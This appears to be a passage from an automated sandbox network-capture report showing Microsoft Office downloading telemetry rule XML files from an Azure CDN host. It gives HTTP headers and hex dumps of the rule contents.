                                            2024-11-18 20:16:35 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                            2024-11-18 20:16:35 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                            2024-11-18 20:16:35 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                            2024-11-18 20:16:35 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                            2024-11-18 20:16:35 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27192.168.2.44978013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:36 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:36 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:36 GMT
                                            Content-Type: text/xml
                                            Content-Length: 408
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                            ETag: "0x8DC582BB56D3AFB"
                                            x-ms-request-id: 6ebc7fcd-801e-00a0-42aa-372196000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201636Z-164f84587bfh9nvdhC1DFWmce000000004a0000000002v9e
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:36 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28192.168.2.44977713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:36 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:36 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:36 GMT
                                            Content-Type: text/xml
                                            Content-Length: 450
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                            ETag: "0x8DC582BD4C869AE"
                                            x-ms-request-id: 05f35093-901e-0016-5b99-38efe9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201636Z-1866b5c5fbbnjgfwhC1DFW3usc00000001n0000000004bzg
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:36 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29192.168.2.44977613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:36 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:36 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:36 GMT
                                            Content-Type: text/xml
                                            Content-Length: 2980
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                            ETag: "0x8DC582BA80D96A1"
                                            x-ms-request-id: ec16a966-001e-0014-49c6-375151000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201636Z-16547b76f7ftfv4jhC1DFWuhug00000003v000000000mdhe
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:36 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            30192.168.2.44977913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:36 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:36 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:36 GMT
                                            Content-Type: text/xml
                                            Content-Length: 2160
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                            ETag: "0x8DC582BA3B95D81"
                                            x-ms-request-id: 1270a440-201e-00aa-78a0-373928000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201636Z-16547b76f7fwm7vghC1DFW900s00000003y0000000006bu2
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:36 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            31192.168.2.44977813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:36 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:36 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:36 GMT
                                            Content-Type: text/xml
                                            Content-Length: 3788
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                            ETag: "0x8DC582BAC2126A6"
                                            x-ms-request-id: 31be6f69-e01e-00aa-387f-37ceda000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201636Z-16547b76f7ftnm6xhC1DFW9c8c00000005u000000000vu6y
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:36 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            32192.168.2.44978313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:37 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:37 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:37 GMT
                                            Content-Type: text/xml
                                            Content-Length: 471
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                            ETag: "0x8DC582BB10C598B"
                                            x-ms-request-id: da60be55-301e-0099-21b0-376683000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201637Z-1866b5c5fbbkcpv2hC1DFWf1yc00000006a000000000kgd8
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:37 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            33192.168.2.44978113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:37 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:37 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:37 GMT
                                            Content-Type: text/xml
                                            Content-Length: 474
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                            ETag: "0x8DC582B9964B277"
                                            x-ms-request-id: 9a209ebf-201e-0096-69f1-37ace6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201637Z-164f84587bflm48hhC1DFW0nf80000000350000000000ukw
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:37 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            34192.168.2.44978413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:37 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:37 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:37 GMT
                                            Content-Type: text/xml
                                            Content-Length: 632
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                            ETag: "0x8DC582BB6E3779E"
                                            x-ms-request-id: f6a022a0-001e-0034-7476-39dd04000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201637Z-1866b5c5fbbkcpv2hC1DFWf1yc00000006bg00000000ed5z
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:37 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            35192.168.2.44978213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:37 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:37 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:37 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                            ETag: "0x8DC582B9F6F3512"
                                            x-ms-request-id: dc576d04-601e-003d-79ef-396f25000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201637Z-16547b76f7fjx5nrhC1DFW4dsc00000003f000000000f9m8
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
